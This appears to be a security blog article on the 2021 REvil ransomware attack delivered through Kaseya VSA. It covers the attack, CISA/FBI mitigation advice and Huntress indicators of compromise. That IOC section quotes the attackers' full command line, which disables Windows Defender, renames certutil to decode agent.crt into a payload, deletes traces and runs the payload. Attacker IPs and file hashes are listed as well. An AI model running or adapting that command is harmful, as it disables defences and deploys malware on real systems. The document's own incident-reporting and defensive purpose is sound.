Kaseya VSA REvil Ransomware Attack 2021.

Kaseya is a US-based organization that provides IT and security management solutions for managed service providers (MSPs) and small to medium-sized businesses (SMBs) worldwide. One of its tools, called Kaseya’s VSA, is under active exploitation and used as an attack vector to install REvil ransomware worldwide. A vulnerability management tool can help mitigate this vulnerability. Kaseya VSA (Virtual System/Server Administrator) is software that provides a centralized console to monitor and manage endpoints, automate IT processes, deploy security patches, and control access. It is available either as a hosted cloud service or via on-premises VSA servers.

On July 2nd, when the Kaseya was in the process of fixing various zero-day vulnerabilities reported privately to it, REvil ransomware operators started exploiting the zero-day vulnerabilities to deploy ransomware. Many companies whose networks managed using Kaseya Virtual System Administrator (VSA) became the victims of this large-scale ransomware attack. This attack sffects more than 1500 businesses worldwide. The REvil ransomware group, however, claims to have encrypted over 1,000,000 systems worldwide in this attack. Researchers at the Dutch Institute for Vulnerability Disclosure (DIVD), who reported many zero-day vulnerabilities believe that the vulnerability identified with CVE-2021-30116 is used in these ransomware attacks. Though, they have not provided any further details about the other vulnerabilities. A patch management software can be used to overcome this.

Kaseya VSA REvil Ransomware

REvil (Ransomware Evil), also known as Sodinokibi, operates as ransomware-as-a-service (RaaS), meaning anyone can buy the service and use the ransomware payload and infrastructure to manage the victim communications distribution of decryption tools. REvil ransomware operators prefer to recruit affiliates to distribute the ransomware instead of attacking companies directly and split the revenue generated from ransom payments. Like many other ransomware families, REvil maintains a website where they publish details of their latest victims and the files collected from them. On their website page called ‘Happy Blog,’ REvil has confirmed that they were behind the attack against Kaseya and has demanded a ransom of 70 million dollars to decrypt files on all organizations affected by this attack.

As per one researcher, the REvil gang has now lowered its demand from 70 million dollars to 50 million dollars. REvil ransomware uses the Salsa20 symmetric stream algorithm for encryption of data and elliptic curve asymmetric algorithm for encrypting the keys. The decryption of files affected by REvil is impossible without the operator’s keys.

CISA and FBI Advice on Kaseya VSA attack

US Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have shared advisory for managed service providers (MSPs) and their customers impacted by this REvil ransomware attack. The MSPs affected by the attack are advised to check their systems for signs of compromise using Kaseya’s detection tool and enable multi-factor authentication (MFA) on as many accounts as possible. MSPs should also implement allowlists to limit access to their internal assets and protect their remote monitoring tools’ admin interface using firewalls or VPNs. The complete list is below.

Download the Kaseya VSA Detection Tool
This tool analyzes a system (either VSA server or managed endpoint) and determines whether any compromise (IOCs) indicators are present.
Enable and enforce multi-factor authentication (MFA) on every single account under the organization’s control, and—to the maximum extent possible—enable and enforce MFA for customer-facing services.
Implement allow the listing to limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs and/or
Place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.

CISA and the FBI also advise affected MSP customers to:

Ensure backups are up to date and stored in an easily retrievable location air-gapped from the organizational network.
Revert to a manual patch management process that follows vendor remediation guidance, including installing new patches as soon as they become available.
Implement MFA and principle of least privilege on key network resources admin accounts.

Indicators of Compromise

Security researchers at Huntress Labs have provided details on initial indicators of compromise for this attack.

Kaseya VSA Servers details of intrusion include:

Attackers uploaded agent.crt and Screenshot.jpg to exploited VSA servers, and this activity can be found in KUpload.log (which *may* be wiped by the attackers or encrypted by ransomware if a VSA agent was also installed on the VSA server).
A series of GET and POST requests using curl can be found within the KaseyaEdgeServices logs located in %ProgramData%\Kaseya\Log\KaseyaEdgeServices directory with a file name following this modified ISO8601 naming scheme KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log.
Attackers came from the following IP addresses using the user agent curl/7.69.1:
18.223.199[.]234 (Amazon Web Services)
161.35.239[.]148 (Digital Ocean)
35.226.94[.]113 (Google Cloud)
162.253.124[.]162 (Sapioterra)
The VSA procedure used to deploy the encrypto named “Kaseya VSA Agent Hot-fix.” An additional procedure named “Archive and Purge Logs” runs to clean up after themselves (screenshot here)
The “Kaseya VSA Agent Hot-fix” procedure ran the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Kaseya VSA agent details of intrusion include:

Ransomware encryptors pushed via the Kaseya VSA agent were dropped in TempPath with the file name agent.crt and decoded to agent.exe. TempPath resolves to c:\kworking\agent.exe by default and is configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\<unique id>
When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path “c:\Windows” to perform DLL sideloading.
The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter which contains several registry values that store encryptor runtime keys/configurations artifacts.
agent.crt – MD5: 939aae3cc456de8964cb182c75a5f8cc – Encoded malicious content
agent.exe – MD5: 561cffbaba71a6e8cc1cdceda990ead4 – Decoded contents of agent.crt
cert.exe – MD5: <random due to appended string> – Legitimate Windows certutil.exe utility
mpsvc.dll – MD5: a47cf00aedf769d60d58bfe00c0b5421– REvil encryptor payload

Affected Applications

All versions of On-Premises Virtual System/Server Administrator (VSA)

Global impact

This has been the largest ransomware attack on record, affecting close to 1500 of Kaseya’s clients spread across 17 countries. The full impact of the attack still analyses cybersecurity professionals globally.

Huntress Labs has closely monitoring this situation as it unfolds, reported that 30 MSPs affected, consequently affecting 1000s of dependent businesses.

Some events as per news reports:

One of the most significant impacts were when 800 stores of Swedish supermarket chain Coop closed after their cash registers disabled during the attack. Swedish state railway services and a prominent pharmacy chain affected varying degrees by the attack.
100 kindergartens in New Zealand had their computers disabled, furthermore 9 schools have also affected in some manner.

As per Kaseya’s status webpage:

“All VSA SaaS servers will be put into maintenance mode. We apologize for any inconvenience. – Kaseya Cloud Operations Team”

Solution

Kaseya has advised all on-premise customers to keep VSA Servers offline until a patch is available. It has also stated that the on-premises patch timeline is 24 hours (or less) from the restoration of SaaS services. Kaseya is also in the process of bringing its SaaS servers online.

Kaseya’s Virtual System/Server Administrator (VSA) Zero-Day Under Active Exploitation By REvil Ransomware